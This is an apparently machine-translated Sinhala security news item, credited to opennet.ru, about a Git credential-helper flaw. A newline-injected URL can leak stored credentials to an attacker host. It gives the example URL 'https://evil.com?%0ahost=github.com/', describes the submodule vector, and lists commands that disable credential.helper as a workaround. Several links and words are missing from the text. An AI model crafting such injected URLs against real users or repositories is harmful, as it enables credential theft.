බෙදා හරින ලද මූලාශ්ර පාලන පද්ධතියේ නිවැරදි කිරීමේ නිකුතු Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 සහ 2.17.4, තුළ ඉවත් කරන ලද () හසුරුවන්නෙහි "", එය git සේවාලාභියෙකු නව රේඛා අක්ෂරයක් සහිත විශේෂයෙන් ෆෝමැට් කරන ලද URL එකක් භාවිතයෙන් ගබඩාවකට ප්රවේශ වූ විට අක්තපත්ර වැරදි සත්කාරක වෙත යැවීමට හේතු වේ. ප්රහාරකයා විසින් පාලනය කරනු ලබන සේවාදායකයක් වෙත යැවීමට වෙනත් ධාරකයෙකුගෙන් අක්තපත්ර සැකසීමට මෙම අවදානම භාවිතා කළ හැක.
“https://evil.com?%0ahost=github.com/” වැනි URL එකක් සඳහන් කරන විට, ධාරක evil.com වෙත සම්බන්ධ වන විට අක්තපත්ර හසුරුවන්නා github.com සඳහා නිශ්චිතව දක්වා ඇති සත්යාපන පරාමිති පසුකර යනු ඇත. උපමොඩියුල සඳහා URL සැකසීම ඇතුළුව "git clone" වැනි මෙහෙයුම් සිදු කරන විට ගැටළුව ඇතිවේ (උදාහරණයක් ලෙස, "git submodule update" ගබඩාවෙන් .gitmodules ගොනුවේ දක්වා ඇති URL ස්වයංක්රීයව සකසනු ඇත). සංවර්ධකයෙකු URL නොදැකීමෙන් ගබඩාවක් ක්ලෝන කරන අවස්ථා වලදී අවදානම වඩාත් භයානක වේ, උදාහරණයක් ලෙස, උපමොඩියුල සමඟ වැඩ කරන විට, හෝ ස්වයංක්රීය ක්රියා කරන පද්ධතිවල, උදාහරණයක් ලෙස, පැකේජ ගොඩනැගීමේ ස්ක්රිප්ට් වල.
නව අනුවාද වල දුර්වලතා අවහිර කිරීමට අක්තපත්ර හුවමාරු ප්රොටෝකෝලය හරහා සම්ප්රේෂණය වන ඕනෑම අගයක නව රේඛා අක්ෂරයක් පසුකර යාම. බෙදාහැරීම් සඳහා, ඔබට පිටු මත පැකේජ යාවත්කාලීන නිකුත් කිරීම නිරීක්ෂණය කළ හැක , , , , , , .
ගැටලුව අවහිර කිරීමට විසඳුමක් ලෙස පොදු ගබඩා වෙත ප්රවේශ වීමේදී credential.helper භාවිතා නොකරන්න සහ පරීක්ෂා නොකළ ගබඩා සහිත "--recurse-submodules" මාදිලියේ "git clone" භාවිතා නොකරන්න. credential.helper හසුරුවන්නා සම්පූර්ණයෙන්ම අක්රිය කිරීමට, එය කරයි සහ මුරපද ලබා ගැනීම , ආරක්ෂා කර ඇත හෝ මුරපද සහිත ගොනුවක්, ඔබට විධාන භාවිතා කළ හැකිය:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
මූලාශ්රය: opennet.ru